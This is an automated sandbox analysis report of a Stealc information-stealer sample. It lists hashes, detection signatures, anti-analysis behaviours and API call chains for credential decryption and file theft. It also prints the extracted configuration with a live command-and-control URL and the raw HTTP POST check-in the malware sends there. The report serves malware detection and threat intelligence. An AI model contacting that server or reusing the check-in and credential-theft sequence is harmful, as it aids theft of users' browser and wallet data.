Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1561529
MD5:915ecb2949f1c2ad737caa35856b4584
SHA1:deaf66961d8b2dda755377ab791b8907b71cf9b5
SHA256:9784693e6d3fe06c253e47536652da2ac85aa94b2d05d83230b2f9734529f854
Tags:exeuser-Bitsight

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 5296 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 915ECB2949F1C2AD737CAA35856B4584)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Yara matches
Source: dump.pcap | Rule: JoeSecurity_Stealc_1 | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000003.2040482339.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000002.2082518165.000000000118E000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: Process Memory Space: file.exe PID: 5296 | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security
Source: Process Memory Space: file.exe PID: 5296 | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security

Sigma matches
No Sigma rule has matched

Suricata IDS alerts
Timestamp: 2024-11-23T16:54:02.395097+0100 | SID: 2044243 | Severity: 1 | Classtype: Malware Command and Control Activity Detected | Source IP: 192.168.2.5 | Source Port: 49704 | Destination IP: 185.215.113.206 | Destination Port: 80 | Protocol: TCP


AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.206/c4becf79229cb002.php/K | Avira URL Cloud: Label: malware
Source: file.exe.5296.0.memstrmin | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00514C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00514C50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005160D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_005160D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005340B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_005340B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00526960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00526960
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0051EA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_0051EA30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00526B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00526B79
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00519B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00519B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00519B80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00519B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00517750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00517750
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005218A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_005218A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00523910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00523910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00521250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00521250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00521269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00521269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0052E210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00524B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00524B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00524B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00524B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0052CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00522390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_00522390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0051DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0051DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0051DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0051DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005223A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_005223A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0052D530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_0052DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005116B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_005116B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005116A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_005116A0

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/c4becf79229cb002.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.206 | Connection: Keep-Alive | Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFCAAKFBAEHJJJJDHIEHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 42 32 38 44 30 44 45 31 33 45 34 32 35 35 38 33 30 34 33 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 2d 2d 0d 0a Data Ascii: ------KKFCAAKFBAEHJJJJDHIEContent-Disposition: form-data; name="hwid"93B28D0DE13E4255830438------KKFCAAKFBAEHJJJJDHIEContent-Disposition: form-data; name="build"mars------KKFCAAKFBAEHJJJJDHIE--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00514C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00514C50
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFCAAKFBAEHJJJJDHIEHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 42 32 38 44 30 44 45 31 33 45 34 32 35 35 38 33 30 34 33 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 2d 2d 0d 0a Data Ascii: ------KKFCAAKFBAEHJJJJDHIEContent-Disposition: form-data; name="hwid"93B28D0DE13E4255830438------KKFCAAKFBAEHJJJJDHIEContent-Disposition: form-data; name="build"mars------KKFCAAKFBAEHJJJJDHIE--
Source: file.exe, 00000000.00000002.2082518165.000000000118E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2082518165.00000000011E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2082518165.00000000011E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000000.00000002.2082518165.00000000011E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: file.exe, 00000000.00000002.2082518165.00000000011E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/K
Source: file.exe, 00000000.00000002.2082518165.00000000011E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php?
Source: file.exe, 00000000.00000002.2082518165.000000000118E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206Z
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00519770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,memset,Sleep,CloseDesktop,0_2_00519770

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0083601D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005348B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008CE1BC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007D693F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008CC1E3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008D890D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008CF93B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008A8AAE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C8B53
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009BE410
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008D142C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008D65CC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008A85F6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C5514
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0079AD85
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008CA61B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0097B624
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008D5630
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008897EC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00813721
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008D2F40
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00514A60 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: enovjnaf ZLIB complexity 0.9947812263615734
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00533A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00533A50
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0052CAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_0052CAE0
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Q3N88L0X.htm
